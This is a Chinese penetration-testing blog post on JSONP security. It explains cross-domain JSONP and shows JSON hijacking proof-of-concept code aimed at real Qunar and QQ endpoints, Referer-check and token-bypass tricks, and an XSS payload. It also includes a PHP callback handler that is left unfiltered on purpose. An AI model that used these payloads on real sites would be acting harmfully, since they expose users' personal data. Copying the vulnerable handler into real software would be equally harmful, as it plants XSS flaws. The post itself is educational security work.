<!DOCTYPE html><html lang="zh"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content="Yumi"><title>jsonp安全 | phyb0x'Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.0.0"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/normalize.css/normalize.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/pure-min.min.css"><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/npm/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="//cdn.jsdelivr.net/npm/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//cdn.jsdelivr.net/npm/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"><script>var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = 'https://hm.baidu.com/hm.js?' + '407830c4543cf3fb1dd23c4a26528c03';
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(hm, s);
  })();
</script><script type="text/javascript" src="//cdn.jsdelivr.net/npm/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="//cdn.jsdelivr.net/gh/codeseven/toastr/build/toastr.min.css"><meta name="generator" content="Hexo 5.4.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">jsonp安全</h1><a id="logo" href="/.">phyb0x'Blog</a><p class="description">智能安全初学者</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Start</i></a><a href="/archives/"><i class="fa fa-archive"> Archiv</i></a><a href="/about/"><i class="fa fa-user"> Über</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">jsonp安全</h1><div class="post-meta">2019-01-14<span> | </span><span class="category"><a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> Hits</span></span><span class="post-time"><span class="post-meta-item-text"> | </span><span class="post-meta-item-icon"><i class="fa fa-keyboard-o"></i><span class="post-count"> 819</span><span class="post-meta-item-text"> Words</span></span></span><span class="post-time"> | <span class="post-meta-item-icon"><i class="fa fa-clock-o"></i><span class="post-count"> 3</span><span class="post-meta-item-text"> Minutes</span></span></span></div><a class="disqus-comment-count" href="/2019/01/14/jsonp%E5%AE%89%E5%85%A8/#vcomment"><span class="valine-comment-count" data-xid="/2019/01/14/jsonp%E5%AE%89%E5%85%A8/"></span><span> Comment</span></a><div class="post-content"><h3 id="JSONP"><a href="#JSONP" class="headerlink" title="JSONP"></a>JSONP</h3><p>JSON with Paddig，JSONP基本语法如下：</p>
<pre><code>callback(&#123; &quot;name&quot;: &quot;kwan&quot; , &quot;msg&quot;: &quot;获取成功&quot; &#125;);
</code></pre>
<p>JSONP是基于JSON格式为解觉跨域问题而产生的解觉方案。</p>
<span id="more"></span>

<h3 id="jsonp-跨域"><a href="#jsonp-跨域" class="headerlink" title="jsonp 跨域"></a>jsonp 跨域</h3><p>说起来也很难简单a.com b.com 假设a.com要访问b.com的json数据</p>
<pre><code>&#123;&quot;id&quot; : &quot;1&quot;,&quot;name&quot; : &quot;phyb0x&quot;&#125;
</code></pre>
<p>b.com上要有一个callback输出点</p>
<pre><code>&lt;?php
//getUsers.php
$callback = $_GET[&#39;callback&#39;];
print $callback.&#39;(&#123;&quot;id&quot; : &quot;1&quot;,&quot;name&quot; : &quot;phyb0x&quot;&#125;);&#39;;
?&gt;
</code></pre>
<p>然后a.com进行调用</p>
<pre><code>&lt;script type=&quot;text/javascript&quot; src=&quot;http://mini.jiasule.com/framework/jquery/1.9.1/jquery-1.9.1.js&quot;&gt;&lt;/script&gt;
&lt;script type=&quot;text/javascript&quot;&gt;
$.getJSON(&quot;http://www.b.com/getUsers.php?callback=?&quot;, function(getUsers)&#123;
  alert(getUsers.name);
&#125;);
&lt;/script&gt;
</code></pre>
<p>会根据callback定义的函数功能返回json数据。</p>
<p>说起来真的晦涩难懂，实际上这个流程就是b.com上本身就有一个jsonp格式传输的点，a.com利用callback传参的函数(可以是内置写好的函数也可以是a.com自定义的(用?表示，同上述例子))去返回相应的数据。</p>
<p>一开始我以为跨域是漏洞的点，但是看了乌云案例发现跨域是jsonp的基本功能，漏洞点在于jsonp传输了一些敏感数据，而我们可以通过csrf+jsonp跨域获到这些敏感数据。</p>
<h3 id="JSONP安全问题"><a href="#JSONP安全问题" class="headerlink" title="JSONP安全问题"></a>JSONP安全问题</h3><h4 id="json劫持"><a href="#json劫持" class="headerlink" title="json劫持"></a>json劫持</h4><p>当某网站使用JSONP传递敏感数据的时候，攻击者可以构造恶意JSONP调用界面，诱导被攻击者访问。</p>
<p>引用wooyun-2013-019969</p>
<pre><code>http://tinfo.qunar.com/ticket/passenger/passenger_info.jsp?&amp;type=passenger&amp;callback=qunarcallback
</code></pre>
<p>构造构造poc跨域获取敏感信息</p>
<pre><code>&lt;script&gt;

function qunarcallback(json)&#123;

    alert(JSON.stringify(json))

&#125;

&lt;/script&gt;

&lt;script src=&quot;http://tinfo.qunar.com/ticket/passenger/passenger_info.jsp?&amp;type=passenger&amp;callback=qunarcallback&quot;&gt;&lt;/script&gt;
</code></pre>
<p><img src="https://i.imgur.com/Lp5eodh.jpg"></p>
<p>有时也会对referer进行限制，可以尝试</p>
<pre><code>http://www.qq.com.attack.com/attack.htm 
http://www.attack.com/attack.htm?qq.com
</code></pre>
<p>或者利用<code>&lt;iframe&gt;</code> 调用 javscript 伪协议来实现空 Referer 调用 JSON 文件</p>
<pre><code>&lt;iframe src=&quot;javascript:&#39;&lt;script&gt;function JSON(o)&#123;alert(o.userinfo.userid);&#125;&lt;/script&gt;&lt;script src=http://www.qq.com/login.php?calback=JSON&gt;&lt;/script&gt;&#39;&quot;&gt;&lt;/iframe&gt;
</code></pre>
<p>还有一种是增加token防御，不过也可以尝试暴力破解</p>
<pre><code>function _Callback(o)&#123;
alert(o.items[0].uin);
&#125;
for(i=17008;i&lt;17009;i++)&#123;  //暴力循环调用
getJSON(&quot;http://r.qzone.qq.com/cgi-bin/tfriend/friend_show_qqfriends.cgi?uin=1111111&amp;g_tk=&quot;+i);
&#125;
</code></pre>
<h4 id="Callback函数可定义"><a href="#Callback函数可定义" class="headerlink" title="Callback函数可定义"></a>Callback函数可定义</h4><pre><code>&lt;?php
//getUsers.php
$callback = $_GET[&#39;callback&#39;];
print $callback.&#39;(&#123;&quot;id&quot; : &quot;1&quot;,&quot;name&quot; : &quot;phyb0x&quot;&#125;);&#39;;
?&gt;
</code></pre>
<p>$callback没有进行任何过滤</p>
<h5 id="Content-Type与XSS"><a href="#Content-Type与XSS" class="headerlink" title="Content-Type与XSS"></a>Content-Type与XSS</h5><p>Content-Type: application/json 传入</p>
<pre><code>http://127.0.0.1/getUsers.php?callback=&lt;script&gt;alert(/xss/)&lt;/script&gt;
</code></pre>
<p>构成xss，而application / javascript  而这个头在 IE 等浏览器下一样可以解析 HTML 导致 XSS 漏洞。</p>
<p>防御绕过姿势</p>
<p>严格定义 Content-Type: application / json，这种方式会不解析恶意插入的 XSS 代码（直接访问提示文件下载），在 IE6、7 等版本时请求的 URL 文件后面加一个 /x.html 就可以解析 html。</p>
<p>过滤 callback 以及 JSON 数据输出，常规防御手段，也粗在绕过可能。</p>
<p>参考链接: </p>
<p><a target="_blank" rel="noopener" href="http://blog.knownsec.com/2015/03/jsonp_security_technic/">http://blog.knownsec.com/2015/03/jsonp_security_technic/</a></p>
</div><div id="donate"><link rel="stylesheet" type="text/css" href="/css/donate.css"><script type="text/javascript" src="/js/donate.js" successtext="Copy Successed!"></script><a class="pos-f tr3" id="github" target="_blank" rel="noopener" href="https://github.com/Kaiyuan/donate-page" arget="_blank" title="Github"></a><div id="DonateText">Donate</div><ul class="list pos-f" id="donateBox"><li id="AliPay" qr="/img/airpy.png"></li></ul><div class="pos-f left-100" id="QRBox"><div id="MainBox"></div></div></div><div class="tags"></div><div class="post-nav"><a class="pre" href="/2019/01/17/weblogic%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%B1%87%E6%80%BB/">weblogic漏洞利用汇总</a><a class="next" href="/2018/12/29/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">横向移动</a></div><div id="vcomment"></div><script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="//unpkg.com/valine@latest/dist/Valine.min.js"></script><script>var notify = 'false' == 'true' ? true : false;
var verify = 'false' == 'true' ? true : false;
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  appId:'MhBSauY8QdXDPd9mzDsCmUQ8-gzGzoHsz',
  appKey:'BwJxec1eCc5PCTXUcPKUHRl0',
  placeholder:'我就只是想看看，字都懒得打...',
  avatar:'mm',
  guest_info:guest_info,
  pageSize:'10'
})
</script></div></div></div><div class="pure-u-1-4 hidden_mid_and_down"><div id="sidebar"><div class="widget"><div class="widget-title"><i class="fa fa-folder-o"> Kategorien</i></div><ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/CTF/">CTF</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/">基础漏洞总结</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/">机器学习</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/">渗透测试</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%84%9A%E6%9C%AC%E5%B7%A5%E5%85%B7/">脚本工具</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E8%BF%90%E7%BB%B4/">运维</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-star-o"> Tags</i></div><div class="tagcloud"></div></div><div class="widget"><div class="widget-title"><i class="fa fa-file-o"> Letzte</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2021/08/05/%E7%89%B9%E5%BE%81%E5%B7%A5%E7%A8%8B/">特征工程</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/20/%E8%BF%87Waf/">sql绕安全狗</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/17/weblogic%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E6%B1%87%E6%80%BB/">weblogic漏洞利用汇总</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/01/14/jsonp%E5%AE%89%E5%85%A8/">jsonp安全</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/29/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">横向移动</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ew%E5%A4%9A%E7%BA%A7%E8%BD%AC%E5%8F%91/">ew多级转发</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/28/ARP%E6%AC%BA%E9%AA%97/">ARP欺骗</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/25/SSRF%E6%B5%85%E6%9E%90/">SSRF浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/23/xxe%E6%B5%85%E6%9E%90/">xxe浅析</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/12/21/win%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">win权限维持</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-external-link"> Blogroll</i></div><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a><ul></ul><a target="_blank"></a></div></div></div><div class="pure-u-1 pure-u-md-3-4"><div id="footer">Copyright © 2021 <a href="/." rel="nofollow">phyb0x'Blog.</a> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a><a rel="nofollow" target="_blank" href="https://github.com/tufu9441/maupassant-hexo"> Theme</a> by<a rel="nofollow" target="_blank" href="https://github.com/pagecho"> Cho.</a></div></div></div><a class="show" id="rocket" href="#top"></a><script type="text/javascript" src="/js/totop.js?v=1.0.0" async></script><script type="text/javascript" src="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.js" async></script><script type="text/javascript" src="/js/fancybox.js?v=1.0.0" async></script><link rel="stylesheet" type="text/css" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox/dist/jquery.fancybox.min.css"><script type="text/javascript" src="/js/copycode.js" successtext="Copy Successed!"></script><link rel="stylesheet" type="text/css" href="/css/copycode.css"><script type="text/javascript" src="/js/codeblock-resizer.js?v=1.0.0"></script><script type="text/javascript" src="/js/smartresize.js?v=1.0.0"></script></div></body></html>